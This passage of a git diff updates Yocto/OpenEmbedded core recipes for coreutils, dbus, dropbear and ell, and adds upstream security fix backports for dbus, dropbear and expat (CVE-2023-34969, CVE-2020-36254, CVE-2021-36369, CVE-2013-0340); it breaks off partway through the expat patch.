SRC_URI[md5sum] = "0009a224d8e288e8ec406ef0161f9293"
SRC_URI[sha256sum] = "ff7a9c918edce6b4f4b2725e3f9b37b0c4d193531cac49a48b56c4d0d3a9e9fd"
+# http://git.savannah.gnu.org/cgit/coreutils.git/commit/?id=v8.27-101-gf5d7c0842
+# runcon is not really a sandbox command, use `runcon ... setsid ...` to avoid this particular issue.
+CVE_CHECK_WHITELIST += "CVE-2016-2781"
+
EXTRA_OECONF_class-native = "--without-gmp"
EXTRA_OECONF_class-target = "--enable-install-program=arch,hostname --libexecdir=${libdir}"
EXTRA_OECONF_class-nativesdk = "--enable-install-program=arch,hostname"
@@ -39,11 +43,15 @@ PACKAGECONFIG_class-target ??= "\
# The lib/oe/path.py requires xattr
PACKAGECONFIG_class-native ??= "xattr"
+# oe-core builds need xattr support
+PACKAGECONFIG_class-nativesdk ??= "xattr"
+
# with, without, depends, rdepends
#
PACKAGECONFIG[acl] = "--enable-acl,--disable-acl,acl,"
PACKAGECONFIG[xattr] = "--enable-xattr,--disable-xattr,attr,"
PACKAGECONFIG[single-binary] = "--enable-single-binary,--disable-single-binary,,"
+PACKAGECONFIG[openssl] = "--with-openssl=yes,--with-openssl=no,openssl"
# [ df mktemp nice printenv base64 gets a special treatment and is not included in this
bindir_progs = "arch basename chcon cksum comm csplit cut dir dircolors dirname du \
diff --git a/meta/recipes-core/dbus-wait/dbus-wait_git.bb b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
index c24295b537..b39f7523c0 100644
--- a/meta/recipes-core/dbus-wait/dbus-wait_git.bb
+++ b/meta/recipes-core/dbus-wait/dbus-wait_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "A simple tool to wait for a specific signal over DBus"
HOMEPAGE = "http://git.yoctoproject.org/cgit/cgit.cgi/dbus-wait"
+DESCRIPTION = "${SUMMARY}"
SECTION = "base"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
@@ -10,7 +11,7 @@ SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
PV = "0.1+git${SRCPV}"
PR = "r2"
-SRC_URI = "git://git.yoctoproject.org/${BPN}"
+SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master"
UPSTREAM_CHECK_COMMITS = "1"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/dbus/dbus-test_1.12.16.bb b/meta/recipes-core/dbus/dbus-test_1.12.24.bb
index bea0e74ed0..755c841bad 100644
--- a/meta/recipes-core/dbus/dbus-test_1.12.16.bb
+++ b/meta/recipes-core/dbus/dbus-test_1.12.24.bb
@@ -1,57 +1,31 @@
SUMMARY = "D-Bus test package (for D-bus functionality testing only)"
HOMEPAGE = "http://dbus.freedesktop.org"
SECTION = "base"
-LICENSE = "AFL-2.1 | GPLv2+"
-LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
- file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
-DEPENDS = "dbus glib-2.0"
+require dbus.inc
-RDEPENDS_${PN}-dev = ""
+SRC_URI += "file://run-ptest \
+ file://python-config.patch \
+ "
-SRC_URI = "http://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
- file://tmpdir.patch \
- file://run-ptest \
- file://python-config.patch \
- file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
- "
+DEPENDS = "dbus glib-2.0"
-SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890"
-SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80"
+RDEPENDS_${PN}-dev = ""
S="${WORKDIR}/dbus-${PV}"
FILESEXTRAPATHS =. "${FILE_DIRNAME}/dbus:"
-inherit autotools pkgconfig gettext ptest upstream-version-is-even
+inherit ptest
-EXTRA_OECONF_X = "${@bb.utils.contains('DISTRO_FEATURES', 'x11', '--with-x', '--without-x', d)}"
-EXTRA_OECONF_X_class-native = "--without-x"
-
-EXTRA_OECONF = "--enable-tests \
+EXTRA_OECONF += "--enable-tests \
--enable-modular-tests \
--enable-installed-tests \
--enable-checks \
--enable-asserts \
- --enable-largefile \
- --disable-xml-docs \
- --disable-doxygen-docs \
- --disable-libaudit \
--with-dbus-test-dir=${PTEST_PATH} \
- ${EXTRA_OECONF_X} \
--enable-embedded-tests \
"
-EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
-
-PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)}"
-PACKAGECONFIG_class-native = ""
-PACKAGECONFIG_class-nativesdk = ""
-
-PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
-PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
-PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
-PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,,"
-
do_install() {
:
}
diff --git a/meta/recipes-core/dbus/dbus.inc b/meta/recipes-core/dbus/dbus.inc
new file mode 100644
index 0000000000..9b5cc53d92
--- /dev/null
+++ b/meta/recipes-core/dbus/dbus.inc
@@ -0,0 +1,36 @@
+inherit autotools pkgconfig gettext upstream-version-is-even
+
+LICENSE = "AFL-2.1 | GPLv2+"
+LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
+ file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
+
+SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
+ file://tmpdir.patch \
+ file://dbus-1.init \
+ file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
+ file://CVE-2023-34969.patch \
+"
+
+SRC_URI[sha256sum] = "bc42d196c1756ac520d61bf3ccd6f42013617def45dd1e591a6091abf51dca38"
+
+EXTRA_OECONF = "--disable-xml-docs \
+ --disable-doxygen-docs \
+ --disable-libaudit \
+ --enable-largefile \
+ --with-system-socket=/run/dbus/system_bus_socket \
+ "
+EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
+EXTRA_OECONF_append_class-native = " --disable-selinux"
+
+PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \
+ user-session \
+ "
+PACKAGECONFIG_class-native = ""
+PACKAGECONFIG_class-nativesdk = ""
+
+PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
+PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
+PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
+PACKAGECONFIG[verbose-mode] = "--enable-verbose-mode,,,"
+
+CVE_PRODUCT += "d-bus_project:d-bus freedesktop:dbus freedesktop:libdbus"
diff --git a/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch b/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch
deleted file mode 100644
index ac7a4b7a71..0000000000
--- a/meta/recipes-core/dbus/dbus/CVE-2020-12049.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From 872b085f12f56da25a2dbd9bd0b2dff31d5aea63 Mon Sep 17 00:00:00 2001
-From: Simon McVittie <smcv@collabora.com>
-Date: Thu, 16 Apr 2020 14:45:11 +0100
-Subject: [PATCH] sysdeps-unix: On MSG_CTRUNC, close the fds we did receive
-
-MSG_CTRUNC indicates that we have received fewer fds that we should
-have done because the buffer was too small, but we were treating it
-as though it indicated that we received *no* fds. If we received any,
-we still have to make sure we close them, otherwise they will be leaked.
-
-On the system bus, if an attacker can induce us to leak fds in this
-way, that's a local denial of service via resource exhaustion.
-
-Reported-by: Kevin Backhouse, GitHub Security Lab
-Fixes: dbus#294
-Fixes: CVE-2020-12049
-Fixes: GHSL-2020-057
-
-Upstream-Status: Backport [https://gitlab.freedesktop.org/dbus/dbus/-/commit/872b085f12f56da25a2dbd9bd0b2dff31d5aea63]
-CVE: CVE-2020-12049
-Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
----
- dbus/dbus-sysdeps-unix.c | 32 ++++++++++++++++++++------------
- 1 file changed, 20 insertions(+), 12 deletions(-)
-
-diff --git a/dbus/dbus-sysdeps-unix.c b/dbus/dbus-sysdeps-unix.c
-index b5fc2466..b176dae1 100644
---- a/dbus/dbus-sysdeps-unix.c
-+++ b/dbus/dbus-sysdeps-unix.c
-@@ -435,18 +435,6 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd,
- struct cmsghdr *cm;
- dbus_bool_t found = FALSE;
-
-- if (m.msg_flags & MSG_CTRUNC)
-- {
-- /* Hmm, apparently the control data was truncated. The bad
-- thing is that we might have completely lost a couple of fds
-- without chance to recover them. Hence let's treat this as a
-- serious error. */
--
-- errno = ENOSPC;
-- _dbus_string_set_length (buffer, start);
-- return -1;
-- }
--
- for (cm = CMSG_FIRSTHDR(&m); cm; cm = CMSG_NXTHDR(&m, cm))
- if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_RIGHTS)
- {
-@@ -501,6 +489,26 @@ _dbus_read_socket_with_unix_fds (DBusSocket fd,
- if (!found)
- *n_fds = 0;
-
-+ if (m.msg_flags & MSG_CTRUNC)
-+ {
-+ unsigned int i;
-+
-+ /* Hmm, apparently the control data was truncated. The bad
-+ thing is that we might have completely lost a couple of fds
-+ without chance to recover them. Hence let's treat this as a
-+ serious error. */
-+
-+ /* We still need to close whatever fds we *did* receive,
-+ * otherwise they'll never get closed. (CVE-2020-12049) */
-+ for (i = 0; i < *n_fds; i++)
-+ close (fds[i]);
-+
-+ *n_fds = 0;
-+ errno = ENOSPC;
-+ _dbus_string_set_length (buffer, start);
-+ return -1;
-+ }
-+
- /* put length back (doesn't actually realloc) */
- _dbus_string_set_length (buffer, start + bytes_read);
-
---
-2.25.1
-
diff --git a/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch b/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch
new file mode 100644
index 0000000000..8f29185cf6
--- /dev/null
+++ b/meta/recipes-core/dbus/dbus/CVE-2023-34969.patch
@@ -0,0 +1,96 @@
+From 37a4dc5835731a1f7a81f1b67c45b8dfb556dd1c Mon Sep 17 00:00:00 2001
+From: hongjinghao <q1204531485@163.com>
+Date: Mon, 5 Jun 2023 18:17:06 +0100
+Subject: [PATCH] bus: Assign a serial number for messages from the driver
+
+Normally, it's enough to rely on a message being given a serial number
+by the DBusConnection just before it is actually sent. However, in the
+rare case where the policy blocks the driver from sending a message
+(due to a deny rule or the outgoing message quota being full), we need
+to get a valid serial number sooner, so that we can copy it into the
+DBUS_HEADER_FIELD_REPLY_SERIAL field (which is mandatory) in the error
+message sent to monitors. Otherwise, the dbus-daemon will crash with
+an assertion failure if at least one Monitoring client is attached,
+because zero is not a valid serial number to copy.
+
+This fixes a denial-of-service vulnerability: if a privileged user is
+monitoring the well-known system bus using a Monitoring client like
+dbus-monitor or `busctl monitor`, then an unprivileged user can cause
+denial-of-service by triggering this crash. A mitigation for this
+vulnerability is to avoid attaching Monitoring clients to the system
+bus when they are not needed. If there are no Monitoring clients, then
+the vulnerable code is not reached.
+
+Co-authored-by: Simon McVittie <smcv@collabora.com>
+Resolves: dbus/dbus#457
+(cherry picked from commit b159849e031000d1dbc1ab876b5fc78a3ce9b534)
+---
+ bus/connection.c | 15 +++++++++++++++
+ dbus/dbus-connection-internal.h | 2 ++
+ dbus/dbus-connection.c | 11 ++++++++++-
+ 3 files changed, 27 insertions(+), 1 deletion(-)
+
+diff --git a/bus/connection.c b/bus/connection.c
+index b3583433..215f0230 100644
+--- a/bus/connection.c
++++ b/bus/connection.c
+@@ -2350,6 +2350,21 @@ bus_transaction_send_from_driver (BusTransaction *transaction,
+ if (!dbus_message_set_sender (message, DBUS_SERVICE_DBUS))
+ return FALSE;
+
++ /* Make sure the message has a non-zero serial number, otherwise
++ * bus_transaction_capture_error_reply() will not be able to mock up
++ * a corresponding reply for it. Normally this would be delayed until
++ * the first time we actually send the message out from a
++ * connection, when the transaction is committed, but that's too late
++ * in this case.
++ */
++ if (dbus_message_get_serial (message) == 0)
++ {
++ dbus_uint32_t next_serial;
++
++ next_serial = _dbus_connection_get_next_client_serial (connection);
++ dbus_message_set_serial (message, next_serial);
++ }
++
+ if (bus_connection_is_active (connection))
+ {
+ if (!dbus_message_set_destination (message,
+diff --git a/dbus/dbus-connection-internal.h b/dbus/dbus-connection-internal.h
+index 48357321..ba79b192 100644
+--- a/dbus/dbus-connection-internal.h
++++ b/dbus/dbus-connection-internal.h
+@@ -54,6 +54,8 @@ DBUS_PRIVATE_EXPORT
+ DBusConnection * _dbus_connection_ref_unlocked (DBusConnection *connection);
+ DBUS_PRIVATE_EXPORT
+ void _dbus_connection_unref_unlocked (DBusConnection *connection);
++DBUS_PRIVATE_EXPORT
++dbus_uint32_t _dbus_connection_get_next_client_serial (DBusConnection *connection);
+ void _dbus_connection_queue_received_message_link (DBusConnection *connection,
+ DBusList *link);
+ dbus_bool_t _dbus_connection_has_messages_to_send_unlocked (DBusConnection *connection);
+diff --git a/dbus/dbus-connection.c b/dbus/dbus-connection.c
+index c525b6dc..09cef278 100644
+--- a/dbus/dbus-connection.c
++++ b/dbus/dbus-connection.c
+@@ -1456,7 +1456,16 @@ _dbus_connection_unref_unlocked (DBusConnection *connection)
+ _dbus_connection_last_unref (connection);
+ }
+
+-static dbus_uint32_t
++/**
++ * Allocate and return the next non-zero serial number for outgoing messages.
++ *
++ * This method is only valid to call from single-threaded code, such as
++ * the dbus-daemon, or with the connection lock held.
++ *
++ * @param connection the connection
++ * @returns A suitable serial number for the next message to be sent on the connection.
++ */
++dbus_uint32_t
+ _dbus_connection_get_next_client_serial (DBusConnection *connection)
+ {
+ dbus_uint32_t serial;
+--
+2.25.1
+
diff --git a/meta/recipes-core/dbus/dbus_1.12.16.bb b/meta/recipes-core/dbus/dbus_1.12.24.bb
index 10d1b34448..cf6f7dc0ef 100644
--- a/meta/recipes-core/dbus/dbus_1.12.16.bb
+++ b/meta/recipes-core/dbus/dbus_1.12.24.bb
@@ -2,9 +2,9 @@ SUMMARY = "D-Bus message bus"
DESCRIPTION = "D-Bus is a message bus system, a simple way for applications to talk to one another. In addition to interprocess communication, D-Bus helps coordinate process lifecycle; it makes it simple and reliable to code a \"single instance\" application or daemon, and to launch applications and daemons on demand when their services are needed."
HOMEPAGE = "https://dbus.freedesktop.org"
SECTION = "base"
-LICENSE = "AFL-2.1 | GPLv2+"
-LIC_FILES_CHKSUM = "file://COPYING;md5=10dded3b58148f3f1fd804b26354af3e \
- file://dbus/dbus.h;beginline=6;endline=20;md5=7755c9d7abccd5dbd25a6a974538bb3c"
+
+require dbus.inc
+
DEPENDS = "expat virtual/libintl autoconf-archive"
RDEPENDS_dbus_class-native = ""
RDEPENDS_dbus_class-nativesdk = ""
@@ -12,17 +12,7 @@ PACKAGES += "${@bb.utils.contains('DISTRO_FEATURES', 'ptest', '${PN}-ptest', '',
ALLOW_EMPTY_dbus-ptest = "1"
RDEPENDS_dbus-ptest_class-target = "dbus-test-ptest"
-SRC_URI = "https://dbus.freedesktop.org/releases/dbus/dbus-${PV}.tar.gz \
- file://tmpdir.patch \
- file://dbus-1.init \
- file://clear-guid_from_server-if-send_negotiate_unix_f.patch \
- file://CVE-2020-12049.patch \
-"
-
-SRC_URI[md5sum] = "2dbeae80dfc9e3632320c6a53d5e8890"
-SRC_URI[sha256sum] = "54a22d2fa42f2eb2a871f32811c6005b531b9613b1b93a0d269b05e7549fec80"
-
-inherit useradd autotools pkgconfig gettext update-rc.d upstream-version-is-even
+inherit useradd update-rc.d
INITSCRIPT_NAME = "dbus-1"
INITSCRIPT_PARAMS = "start 02 5 3 2 . stop 20 0 1 6 ."
@@ -93,27 +83,7 @@ pkg_postinst_dbus() {
}
-EXTRA_OECONF = "--disable-tests \
- --disable-xml-docs \
- --disable-doxygen-docs \
- --disable-libaudit \
- --enable-largefile \
- --with-system-socket=/run/dbus/system_bus_socket \
- "
-
-EXTRA_OECONF_append_class-target = " SYSTEMCTL=${base_bindir}/systemctl"
-EXTRA_OECONF_append_class-native = " --disable-selinux"
-
-PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'systemd x11', d)} \
- user-session \
- "
-
-PACKAGECONFIG_class-native = ""
-PACKAGECONFIG_class-nativesdk = ""
-
-PACKAGECONFIG[systemd] = "--enable-systemd --with-systemdsystemunitdir=${systemd_system_unitdir},--disable-systemd --without-systemdsystemunitdir,systemd"
-PACKAGECONFIG[x11] = "--with-x --enable-x11-autolaunch,--without-x --disable-x11-autolaunch, virtual/libx11 libsm"
-PACKAGECONFIG[user-session] = "--enable-user-session --with-systemduserunitdir=${systemd_user_unitdir},--disable-user-session"
+EXTRA_OECONF += "--disable-tests"
do_install() {
autotools_do_install
diff --git a/meta/recipes-core/dropbear/dropbear.inc b/meta/recipes-core/dropbear/dropbear.inc
index 7269888a4e..0f5e9ba4ac 100644
--- a/meta/recipes-core/dropbear/dropbear.inc
+++ b/meta/recipes-core/dropbear/dropbear.inc
@@ -1,5 +1,6 @@
SUMMARY = "A lightweight SSH and SCP implementation"
HOMEPAGE = "http://matt.ucc.asn.au/dropbear/dropbear.html"
+DESCRIPTION = "Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for "embedded"-type Linux (or other Unix) systems, such as wireless routers."
SECTION = "console/network"
# some files are from other projects and have others license terms:
@@ -11,6 +12,11 @@ DEPENDS = "zlib virtual/crypt"
RPROVIDES_${PN} = "ssh sshd"
RCONFLICTS_${PN} = "openssh-sshd openssh"
+# break dependency on base package for -dev package
+# otherwise SDK fails to build as the main openssh and dropbear packages
+# conflict with each other
+RDEPENDS:${PN}-dev = ""
+
DEPENDS += "${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}"
SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \
@@ -21,7 +27,10 @@ SRC_URI = "http://matt.ucc.asn.au/dropbear/releases/dropbear-${PV}.tar.bz2 \
file://dropbear.socket \
file://dropbear.default \
${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
- ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} "
+ ${@bb.utils.contains('PACKAGECONFIG', 'disable-weak-ciphers', 'file://dropbear-disable-weak-ciphers.patch', '', d)} \
+ file://CVE-2020-36254.patch \
+ file://CVE-2021-36369.patch \
+ "
PAM_SRC_URI = "file://0005-dropbear-enable-pam.patch \
file://0006-dropbear-configuration-file.patch \
diff --git a/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch b/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
new file mode 100644
index 0000000000..64d0d96486
--- /dev/null
+++ b/meta/recipes-core/dropbear/dropbear/CVE-2020-36254.patch
@@ -0,0 +1,29 @@
+From c96c48d62aefc372f2105293ddf8cff2d116dc3a Mon Sep 17 00:00:00 2001
+From: Haelwenn Monnier <contact+github.com@hacktivis.me>
+Date: Mon, 25 May 2020 14:54:29 +0200
+Subject: [PATCH] scp.c: Port OpenSSH CVE-2018-20685 fix (#80)
+
+Reference:
+https://github.com/mkj/dropbear/commit/8f8a3dff705fad774a10864a2e3dbcfa9779ceff
+
+CVE: CVE-2020-36254
+Upstream-Status: Backport
+
+---
+ scp.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/scp.c b/scp.c
+index 742ae00..7b8e7d2 100644
+--- a/scp.c
++++ b/scp.c
+@@ -935,7 +935,8 @@ sink(int argc, char **argv)
+ size = size * 10 + (*cp++ - '0');
+ if (*cp++ != ' ')
+ SCREWUP("size not delimited");
+- if ((strchr(cp, '/') != NULL) || (strcmp(cp, "..") == 0)) {
++ if (*cp == '\0' || strchr(cp, '/') != NULL ||
++ strcmp(cp, ".") == 0 || strcmp(cp, "..") == 0) {
+ run_err("error: unexpected filename: %s", cp);
+ exit(1);
+ }
diff --git a/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch b/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch
new file mode 100644
index 0000000000..5cabe8339d
--- /dev/null
+++ b/meta/recipes-core/dropbear/dropbear/CVE-2021-36369.patch
@@ -0,0 +1,145 @@
+From e10dec82930863e487b22978d3df107274f366b2 Mon Sep 17 00:00:00 2001
+From: Manfred Kaiser <37737811+manfred-kaiser@users.noreply.github.com>
+Date: Thu, 19 Aug 2021 17:37:14 +0200
+Subject: [PATCH] added option to disable trivial auth methods (#128)
+
+* added option to disable trivial auth methods
+
+* rename argument to match with other ssh clients
+
+* fixed trivial auth detection for pubkeys
+
+[https://github.com/mkj/dropbear/pull/128]
+Upstream-Status: Backport
+CVE: CVE-2021-36369
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ cli-auth.c | 3 +++
+ cli-authinteract.c | 1 +
+ cli-authpasswd.c | 2 +-
+ cli-authpubkey.c | 1 +
+ cli-runopts.c | 7 +++++++
+ cli-session.c | 1 +
+ runopts.h | 1 +
+ session.h | 1 +
+ 8 files changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/cli-auth.c b/cli-auth.c
+index 2e509e5..6f04495 100644
+--- a/cli-auth.c
++++ b/cli-auth.c
+@@ -267,6 +267,9 @@ void recv_msg_userauth_success() {
+ if DROPBEAR_CLI_IMMEDIATE_AUTH is set */
+
+ TRACE(("received msg_userauth_success"))
++ if (cli_opts.disable_trivial_auth && cli_ses.is_trivial_auth) {
++ dropbear_exit("trivial authentication not allowed");
++ }
+ /* Note: in delayed-zlib mode, setting authdone here
+ * will enable compression in the transport layer */
+ ses.authstate.authdone = 1;
+diff --git a/cli-authinteract.c b/cli-authinteract.c
+index e1cc9a1..f7128ee 100644
+--- a/cli-authinteract.c
++++ b/cli-authinteract.c
+@@ -114,6 +114,7 @@ void recv_msg_userauth_info_request() {
+ m_free(instruction);
+
+ for (i = 0; i < num_prompts; i++) {
++ cli_ses.is_trivial_auth = 0;
+ unsigned int response_len = 0;
+ prompt = buf_getstring(ses.payload, NULL);
+ cleantext(prompt);
+diff --git a/cli-authpasswd.c b/cli-authpasswd.c
+index 00fdd8b..a24d43e 100644
+--- a/cli-authpasswd.c
++++ b/cli-authpasswd.c
+@@ -155,7 +155,7 @@ void cli_auth_password() {
+
+ encrypt_packet();
+ m_burn(password, strlen(password));
+-
++ cli_ses.is_trivial_auth = 0;
+ TRACE(("leave cli_auth_password"))
+ }
+ #endif /* DROPBEAR_CLI_PASSWORD_AUTH */
+diff --git a/cli-authpubkey.c b/cli-authpubkey.c
+index 7cee164..7da1a04 100644
+--- a/cli-authpubkey.c
++++ b/cli-authpubkey.c
+@@ -174,6 +174,7 @@ static void send_msg_userauth_pubkey(sign_key *key, int type, int realsign) {
+ buf_putbytes(sigbuf, ses.writepayload->data, ses.writepayload->len);
+ cli_buf_put_sign(ses.writepayload, key, type, sigbuf);
+ buf_free(sigbuf); /* Nothing confidential in the buffer */
++ cli_ses.is_trivial_auth = 0;
+ }
+
+ encrypt_packet();
+diff --git a/cli-runopts.c b/cli-runopts.c
+index 7d1fffe..6bf8b8e 100644
+--- a/cli-runopts.c
++++ b/cli-runopts.c
+@@ -152,6 +152,7 @@ void cli_getopts(int argc, char ** argv) {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ cli_opts.exit_on_fwd_failure = 0;
+ #endif
++ cli_opts.disable_trivial_auth = 0;
+ #if DROPBEAR_CLI_LOCALTCPFWD
+ cli_opts.localfwds = list_new();
+ opts.listen_fwd_all = 0;
+@@ -888,6 +889,7 @@ static void add_extendedopt(const char* origstr) {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ "\tExitOnForwardFailure\n"
+ #endif
++ "\tDisableTrivialAuth\n"
+ #ifndef DISABLE_SYSLOG
+ "\tUseSyslog\n"
+ #endif
+@@ -915,5 +917,10 @@ static void add_extendedopt(const char* origstr) {
+ return;
+ }
+
++ if (match_extendedopt(&optstr, "DisableTrivialAuth") == DROPBEAR_SUCCESS) {
++ cli_opts.disable_trivial_auth = parse_flag_value(optstr);
++ return;
++ }
++
+ dropbear_log(LOG_WARNING, "Ignoring unknown configuration option '%s'", origstr);
+ }
+diff --git a/cli-session.c b/cli-session.c
+index 56dd4af..73ef0db 100644
+--- a/cli-session.c
++++ b/cli-session.c
+@@ -164,6 +164,7 @@ static void cli_session_init(pid_t proxy_cmd_pid) {
+ /* Auth */
+ cli_ses.lastprivkey = NULL;
+ cli_ses.lastauthtype = 0;
++ cli_ses.is_trivial_auth = 1;
+
+ /* For printing "remote host closed" for the user */
+ ses.remoteclosed = cli_remoteclosed;
+diff --git a/runopts.h b/runopts.h
+index 31eae1f..8519626 100644
+--- a/runopts.h
++++ b/runopts.h
+@@ -154,6 +154,7 @@ typedef struct cli_runopts {
+ #if DROPBEAR_CLI_ANYTCPFWD
+ int exit_on_fwd_failure;
+ #endif
++ int disable_trivial_auth;
+ #if DROPBEAR_CLI_REMOTETCPFWD
+ m_list * remotefwds;
+ #endif
+diff --git a/session.h b/session.h
+index 0f77055..8676054 100644
+--- a/session.h
++++ b/session.h
+@@ -287,6 +287,7 @@ struct clientsession {
+
+ int lastauthtype; /* either AUTH_TYPE_PUBKEY or AUTH_TYPE_PASSWORD,
+ for the last type of auth we tried */
++ int is_trivial_auth;
+ int ignore_next_auth_response;
+ #if DROPBEAR_CLI_INTERACT_AUTH
+ int auth_interact_failed; /* flag whether interactive auth can still
diff --git a/meta/recipes-core/ell/ell_0.33.bb b/meta/recipes-core/ell/ell_0.33.bb
index 2fa05104fb..bef1e9a0b5 100644
--- a/meta/recipes-core/ell/ell_0.33.bb
+++ b/meta/recipes-core/ell/ell_0.33.bb
@@ -1,4 +1,5 @@
SUMMARY = "Embedded Linux Library"
+HOMEPAGE = "https://01.org/ell"
DESCRIPTION = "The Embedded Linux Library (ELL) provides core, \
low-level functionality for system daemons. It typically has no \
dependencies other than the Linux kernel, C standard library, and \
diff --git a/meta/recipes-core/expat/expat/CVE-2013-0340.patch b/meta/recipes-core/expat/expat/CVE-2013-0340.patch
new file mode 100644
index 0000000000..1ab4d06508
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2013-0340.patch
@@ -0,0 +1,1758 @@
+From a644ccf25392523b1329872310e24d0fc5f40629 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Mon, 19 Apr 2021 21:42:51 +0200
+Subject: [PATCH] expat: Backport fix for CVE-2013-0340
+
+Issue: https://github.com/libexpat/libexpat/issues/34
+
+This patch cherry-picks the following commits from upstream release
+2.4.0 onto 2.2.9:
+
+- b1d039607d3d8a042bf0466bfcc1c0f104e353c8
+- 60959f2b491876199879d97c8ed956eabb0c2e73
+
+Upstream-Status: Backport
+CVE: CVE-2013-0340
+Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
+---
+ lib/expat.h | 21 +-
+ lib/internal.h | 30 +
+ lib/libexpat.def | 3 +
+ lib/libexpatw.def | 3 +
+ lib/xmlparse.c | 1147 +++++++++++++++++++++++++++++++++++++--
+ 5 files changed, 1143 insertions(+), 61 deletions(-)
+
+diff --git a/lib/expat.h b/lib/expat.h
+index 48a6e2a3..0fb70d9d 100644
+--- a/lib/expat.h
++++ b/lib/expat.h
+@@ -115,7 +115,9 @@ enum XML_Error {
+ XML_ERROR_RESERVED_PREFIX_XMLNS,
+ XML_ERROR_RESERVED_NAMESPACE_URI,
+ /* Added in 2.2.1. */
+- XML_ERROR_INVALID_ARGUMENT
++ XML_ERROR_INVALID_ARGUMENT,
++ /* Added in 2.4.0. */
++ XML_ERROR_AMPLIFICATION_LIMIT_BREACH
+ };
+
+ enum XML_Content_Type {
+@@ -997,7 +999,10 @@ enum XML_FeatureEnum {
+ XML_FEATURE_SIZEOF_XML_LCHAR,
+ XML_FEATURE_NS,
+ XML_FEATURE_LARGE_SIZE,
+- XML_FEATURE_ATTR_INFO
++ XML_FEATURE_ATTR_INFO,
++ /* Added in Expat 2.4.0. */
++ XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_MAXIMUM_AMPLIFICATION_DEFAULT,
++ XML_FEATURE_BILLION_LAUGHS_ATTACK_PROTECTION_ACTIVATION_THRESHOLD_DEFAULT
+ /* Additional features must be added to the end of this enum. */
+ };
+
+@@ -1010,6 +1015,18 @@ typedef struct {
+ XMLPARSEAPI(const XML_Feature *)
+ XML_GetFeatureList(void);
+
++#ifdef XML_DTD
++/* Added in Expat 2.4.0. */
++XMLPARSEAPI(XML_Bool)
++XML_SetBillionLaughsAttackProtectionMaximumAmplification(
++ XML_Parser parser, float maximumAmplificationFactor);
++
++/* Added in Expat 2.4.0. */
++XMLPARSEAPI(XML_Bool)
++XML_SetBillionLaughsAttackProtectionActivationThreshold(
++ XML_Parser parser, unsigned long long activationThresholdBytes);
++#endif
++
+ /* Expat follows the semantic versioning convention.
+ See http://semver.org.
+ */
+diff --git a/lib/internal.h b/lib/internal.h
+index 60913dab..d8b31fa2 100644
+--- a/lib/internal.h
++++ b/lib/internal.h
